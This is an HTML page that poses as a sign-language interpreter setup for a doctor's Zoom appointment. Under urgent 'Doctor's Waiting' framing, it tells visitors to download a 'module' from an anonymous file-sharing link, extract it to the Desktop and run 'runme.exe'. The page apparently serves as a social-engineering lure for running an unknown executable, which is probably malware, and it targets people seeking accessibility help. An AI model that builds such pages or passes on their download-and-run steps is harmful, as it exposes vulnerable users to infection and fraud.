<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign Language Interpreter Setup</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: space-between;
            align-items: center;
            height: 100vh;
            background-color: white;
        }
        .left-section {
            margin-left: 20px;
            border: none;
            background-color: whitesmoke;
            padding: 20px;
            width: 40%;
            box-shadow: 2px 0 5px rgba(0, 0, 0, 0.1);
            display: flex;
            flex-direction: column;
            align-items: center;
            text-align: center;
        }
        .header {
            font-size: 2rem;
            margin-bottom: 35px;
            font-weight: bold;
        }
        .instructions {
            margin-bottom: 20px;
            font-size: 1.2rem;
        }
        .download-button {
            display: inline-block;
            margin-bottom: 20px;
            padding: 10px 15px;
            background-color: #007bff;
            color: white;
            text-decoration: none;
            border-radius: 5px;
            text-align: center;
            font-size: 1.2rem;
        }
        .download-button:hover {
            background-color: #0056b3;
        }
        .terminal {
            padding-top: 5px;
            background-color: #333;
            color: #00ff00;
            font-family: "Courier New", Courier, monospace;
            width: 300px;
            padding-left: 10px;
            border-radius: 5px;
            height: 60px;
            font-size: 1.2rem;
            text-align: left;
            margin-bottom: 20px;
        }
        .right-section {
            width: 40%;
            margin-right: 20px;
            padding: 20px;
            display: flex;
            flex-direction: column;
            align-items: center;
            text-align: center;
            background-color: whitesmoke;
            box-shadow: -2px 0 5px rgba(0, 0, 0, 0.1);
        }
        .right-section .heading {
            font-size: 2rem;
            margin-bottom: 20px;
            font-weight: bold;
        }
        .zoom-icon {
            width: 60px;
            height: 50px;
            margin-bottom: 20px;
        }
        .zoom-link {
            font-size: 1.2rem;
            color: #007bff;
            text-decoration: none;
        }
        .zoom-link:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div class="left-section">
        <div class="header">Need a Sign Language Interpreter?</div>
        <div class="instructions">1. Download the following module:</div>
        <a href="https://mega.nz/file/UyFAwJRT#zOhCK3MODAPq_EeUtMibF6AygX1HIBI43lQ_Xyaj9RI" target="_blank" class="download-button">Download Module</a>
        <div class="instructions">2. Extract the folder in <strong>./Desktop</strong> folder and run <strong>runme.exe</strong>.</div>
        
    </div>

    <div class="right-section">
        <div class="heading">Doctor's Waiting</div>
        <img src="zoom-icon8997-removebg-preview.png" alt="Zoom Call" class="zoom-icon">
        <a href="https://us05web.zoom.us/j/82328278867?pwd=mYqRajaWmxUbsL7plmQ1bnZhwYb3Tl.1" target="_blank" class="zoom-link">Join Zoom Call</a>
    </div>
</body>
</html>
